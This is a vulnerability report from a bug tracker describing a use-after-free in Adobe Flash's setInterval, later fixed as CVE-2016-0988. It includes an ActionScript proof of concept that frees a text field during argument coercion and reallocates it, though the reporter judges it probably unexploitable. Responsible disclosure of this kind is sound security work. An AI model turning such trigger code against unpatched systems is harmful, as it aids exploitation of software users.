Status: Fixed
Closed: Mar 2016
Adobe Flash: Use-after-free in setInterval
Project Member Reported by natashenka@google.com, Dec 18 2015
There is a use-after-free in setInterval. If the interval length is an object with valueOf defined, this method gets executed, and can delete the object the interval is being set on. A minimal PoC is as follows:

// Keep a handle to the timeline so func() can allocate a replacement text field later.
_global.thiz = this;
var t = _global.thiz;
var tf = t.createTextField("tf", 1, 1, 2, 3, 4);
tf.natalie = intfunc;
// The interval length is an object, so setInterval calls its valueOf to coerce it to a number.
// That call runs func() while setInterval still holds a pointer to tf.
setInterval(tf, "natalie", {valueOf: func});

// Interval callback: writes the name of whatever object it now runs on into that object's text.
function intfunc(){
	trace("tick");
	trace(this);
	this.text = this;
}

// Runs from inside setInterval's argument coercion: frees tf, then allocates tf2 so it
// reuses the freed slot. Returns the interval length in milliseconds.
function func(){
	tf.removeTextField();
	trace("after free");
	var tf2 = _global.thiz.createTextField("tf2", 5, 1, 2, 300, 400);
	tf2.natalie = intfunc;
	return 100;
}

This PoC demonstrates the use-after-free because the interval is set on the newly allocated object, even though it was called on the object that was freed. The test fails (demonstrates the vulnerability) if the text "_level0.tf2" appears on the screen. It passes otherwise. I have not been able to make this issue cause a crash, as there does not appear to be anything interesting ever allocated in the same heap slot as the freed object, so I think this issue is probably not exploitable. Reporting it because I am not confident of this, especially on 32-bit platforms.

This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.
Attachments: interval.fla (4.9 KB), interval.swf (843 bytes)
Project Member Comment 1 by natashenka@google.com, Mar 22 2016
Labels: -Restrict-View-Commit CVE-2016-0988
Status: Fixed
Fixed in March update